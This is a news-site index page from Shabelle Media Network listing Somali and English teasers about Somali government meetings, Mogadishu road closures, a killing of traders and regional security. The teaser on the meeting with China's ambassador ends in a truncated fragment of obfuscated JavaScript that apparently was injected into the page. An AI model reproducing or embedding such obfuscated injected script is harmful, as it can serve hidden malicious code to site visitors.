Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Wasiirka Gaashaandhigga oo qaabilay wafdi ka socda Jarmalka + Sawirro

MUQDISHO (SMN) - Wasiirka Wasaaradda Gaashaandhigga XFS Mudane Cabdulqaadir Maxamed Nuur ayaa xarunta Wasaaradda Gaashaandhigga ku qaabilay Ergeyga Gaarka ah ee dowladda Jarmalka u qaabilsan Geeska Afrika Amb. Heiko Nitzschke.   Wasiirka iyo Ergayga ayaa kulankooda diiradda ku saaray howlgallada lagu ciribtirayo kooxaha Khawaarijta, wareejinta Howlgalkii ATMIS, u guuridda howlgalka cusub ee AUSSOM iyo xaqiijinta amniga guud ee Soomaaliya. Sidoo kale, kulanka...

Qaar kamid ah waddooyinka Muqdisho oo saaka xiran + Sababta

MUQDISHO (SMN) - Waxaa saaka xiran waddada xiriirsa Zoobe ilaa Km4, wadooyinka soo gala isbitaalka Madiina iyo waddada aada Buula Xuubeey ee magaalada Muqdisho.   Shacabka ayaa lugeynaya iyadoo aysan jirin wax gaadiid ah iyo bajaajtaisticmaalaya waddooyinkaasim Xirnaashiyaha waddooyinkan ayaa loo sababeenayaa in Ra'iisul wasaare Xamza uu ka qeyb-galayo munaasabad baroor diiq ah oo ka dhacaysa isbitaalka Madiina, taasi oo loogu baroor...

Wafdi ka socda DFS iyo QM oo booqday magaalada Baydhabo + Ujeedka

BAYDHABO (SMN) - Wafdi ka socda Wasaaradda Qorsheynta, Maalgashiga iyo Horumarinta Dhaqaalaha ee Soomaaliya iyo Xafiiska Qaramada Midoobay ee Muqdisho ayaa shalay booqday mashaariic muhiim ah oo laga maalgeliyo Sanduuqa Wadajirka ee Soomaaliya (SJF) kuwaas oo ka socda xarumo ku yaala magaalada Baydhabo. Mashaariicda la kormeeray waxaa ka mid ahaa Mashruuca Saameynta, Barnaamijka Caddaaladda iyo Hagaajinta, Barnaamijka Nabadda iyo...

R/wasaare Xamza oo la kulmay ergeyga Jarmalka u qaabilsan Geeska Afrika

MUQDISHO (SMN) - Muqdisho: Isniin 28, Oktoobar 2024: — Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya, Mudane Xamsa Cabdi Barre ayaa maanta xafiiskiisa ku qaabilay Ergayga Gaarka ah ee Dowladda Jarmalka u qaabilsan Geeska Afrika, Mr. Heiko Nitzschke. Ra’iisul Wasaaraha iyo Ergayga Gaarka ah ayaa ka wada hadlay xoojinta xiriirka soo jireenka ah iyo iskaashiga u dhaxeeya Soomaaliya iyo Jarmalka. Ergayga Gaarka ah...

Somali PM Meets German Envoy, Discusses Enhanced Bilateral Ties

MOGADISHU, Somalia — In a diplomatic encounter highlighting Somalia's international engagement, Prime Minister Hamza Abdi Barre met with Heiko Nitzschke, Germany's Special Envoy for the Horn of Africa, to discuss deepening cooperation and celebrate recent achievements on Somalia's path to stability and international integration.   Nitzschke congratulated Somalia on several milestones, including securing debt relief, joining the East African Community, and...

Saddex ganacsato ah oo lagu dilay Muqdisho iyo sababta ka dambeysa

MUQDISHO (SMN) - Illaa sadex ruux oo ganacsato ahaa ayaa maanta lagu dilay agagaarka iskuulka Axmed Gureey oo ku yaalla degmada Daaru-salaam ee gobolka Banaadir.   Sadexda qof ayaa waxaa lagu dhex dilay dukaamadii ay lahaayeen xilli ay ku guda jireen howlahooda shaqo. Rag ku hubeysan Bistoolado ayaa la sheegay in ay gaysteen dilkan, kuwaasi oo toogtay ganacsatadan, kadibna baxsaday. Ganacsatada la dilay...

Wasiirka arrimaha gudaha XFS oo kulan la yeeshay safiirka Shiinaha + Sawirro

MUQDISHO (SMN) - Wasiirka Wasaaradda Arrimaha Gudaha, Federaalka iyo Dib-u-heshiisiinta XFS Xildhibaan Cali Yuusuf Cali (Xoosh) ayaa maanta kulan la qaatay Safiirka dowladda Shiinaha u fadhiya Soomaaliya mudane Ambassador Wang Yu. Inta uu kulanku socday, arrimaha laga hadlay waxaa ugu muhiimsanaa; iskaashiga labada dhinac iyo taageeridda howlaha hortabinta u leh Wasaaradda. Halkan hoose ka daawo Sawirrada:- function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return...

Somalia’s Political Leaders Tackle Security and Election Reforms As NCC Meeting Enters 2nd Day

MOGADISHU, Somalia — The National Consultative Council (NCC) meeting in Mogadishu entered its second day and it has become a pivotal arena for discussions on security and electoral reforms, driven by President Hassan Sheikh Mohamud.   The gathering, which includes key figures such as Prime Minister Hamza Abdi Barre, his deputy Salah Ahmed Jama, and leaders from Galmudug, South West, Hir...

Somali Parliament Speaker Congratulates New Arab Parliamentary Union Chairman

Cairo, Egypt — Sheikh Adan Madobe, the Speaker of the Somali Parliament, extended his congratulations to Mohamed Alymahi, the newly elected Chairman of the Arab Parliamentary Union (APU), following his election during the recent assembly in Cairo, Egypt.   Members of the Arab Parliament convened in Cairo for a meeting where they voted for Alymahi, who hails from the United Arab...

Somalia Seeks Deeper Economic Ties with Germany at Washington Summit

Washington, D.C. — In a significant meeting held on the sidelines of the Annual Meetings in Washington, D.C., Somali Finance Minister Bihi Egeh and German State Minister for Europe Neils Annen discussed strategic economic cooperation and the future trajectory of Somalia's economic landscape.   The dialogue, described as productive by Minister Bihi, delved into Somalia's ambitious economic reforms, which aim to...

WARAR KALE

Somali Prime Minister Arrives in Galmudug for Talks With Regional President

DHUSAMAREB, Somalia – Somali Prime Minister Hamza Abdi Barre arrived in the central city of Dhusamareb on Wednesday for an official visit to Galmudug...

Ra’iisul Wasaare Xamse oo gaaray Dhuusamareeb, kulan la yeeshay Madaxweynaha Galmudug

DHUUSAMAREEB – Ra’iisul Wasaaraha Xukuumadda Federaalka Soomaaliya, Xamse Cabdi Barre, ayaa Arbacadii gaaray magaalada Dhuusamareeb ee caasimadda Galmudug, halkaas oo si diirran loogu soo...

Puntland Announces New Security Measures, Warns Against Unauthorized Militias and Federal Activities

GAROWE, Somalia – Puntland authorities on Wednesday announced a series of new security measures, including restrictions on militia activity, anti-smuggling operations and tighter controls on...